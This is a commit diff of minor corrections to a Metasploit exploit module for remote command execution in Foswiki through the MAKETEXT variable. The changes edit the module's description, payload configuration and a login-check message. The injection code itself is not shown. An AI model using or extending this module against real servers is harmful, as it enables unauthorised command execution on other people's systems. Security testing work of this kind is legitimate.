Small corrections
parent
395a20ef22
commit
9af8c9b457
|
@ -16,18 +16,17 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
super(update_info(info,
|
super(update_info(info,
|
||||||
'Name' => 'Foswiki MAKETEXT Remote Command Execution',
|
'Name' => 'Foswiki MAKETEXT Remote Command Execution',
|
||||||
'Description' => %q{
|
'Description' => %q{
|
||||||
This module exploits a vulnerability in the MAKETEXT Foswiki variable. Using a
|
This module exploits a vulnerability in the MAKETEXT Foswiki variable. By using
|
||||||
specially crafted MAKETEXT, a malicious user can execute shell commands since user
|
a specially crafted MAKETEXT, a malicious user can execute shell commands since the
|
||||||
input is passed to the Perl "eval" command without first being sanitized. The
|
input is passed to the Perl "eval" command without first being sanitized. The
|
||||||
problem is caused by an underlying security issue in the CPAN:Locale::Maketext
|
problem is caused by an underlying security issue in the CPAN:Locale::Maketext
|
||||||
module. This works in Foswiki sites that have user interface localization enabled
|
module. Only Foswiki sites that have user interface localization enabled
|
||||||
(UserInterfaceInternationalisation variable set).
|
(UserInterfaceInternationalisation variable set) are vulnerable.
|
||||||
|
|
||||||
If USERNAME and PASSWORD credentials aren't provided anonymous access will be
|
If USERNAME and PASSWORD aren't provided, anonymous access will be tried.
|
||||||
intended. On the other hand, if the FoswikiPage option isn't provided, the module
|
Also, if the FoswikiPage option isn't provided, the module will try to create a
|
||||||
will try to create a random page on the SandBox space. The modules has been tested
|
random page on the SandBox space. The modules has been tested successfully on
|
||||||
successfully on Foswiki 1.1.5 as distributed with the official Foswiki-1.1.5-vmware
|
Foswiki 1.1.5 as distributed with the official Foswiki-1.1.5-vmware image.
|
||||||
virtual machine.
|
|
||||||
},
|
},
|
||||||
'Author' =>
|
'Author' =>
|
||||||
[
|
[
|
||||||
|
@ -45,12 +44,11 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
'Payload' =>
|
'Payload' =>
|
||||||
{
|
{
|
||||||
'DisableNops' => true,
|
'DisableNops' => true,
|
||||||
'BadChars' => '',
|
|
||||||
'Space' => 1024,
|
'Space' => 1024,
|
||||||
'Compat' =>
|
'Compat' =>
|
||||||
{
|
{
|
||||||
'PayloadType' => 'cmd',
|
'PayloadType' => 'cmd',
|
||||||
'RequiredCmd' => 'generic ruby python bash telnet',
|
'RequiredCmd' => 'generic ruby python bash telnet'
|
||||||
}
|
}
|
||||||
},
|
},
|
||||||
'Platform' => [ 'unix' ],
|
'Platform' => [ 'unix' ],
|
||||||
|
@ -80,7 +78,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
})
|
})
|
||||||
|
|
||||||
if not res or res.code != 302 or res.headers['Set-Cookie'] !~ /FOSWIKISID=([0-9a-f]*)/
|
if not res or res.code != 302 or res.headers['Set-Cookie'] !~ /FOSWIKISID=([0-9a-f]*)/
|
||||||
print_status "#{res.code}\n#{res.body}"
|
vprint_status "#{res.code}\n#{res.body}"
|
||||||
return nil
|
return nil
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
Loading…
Reference in New Issue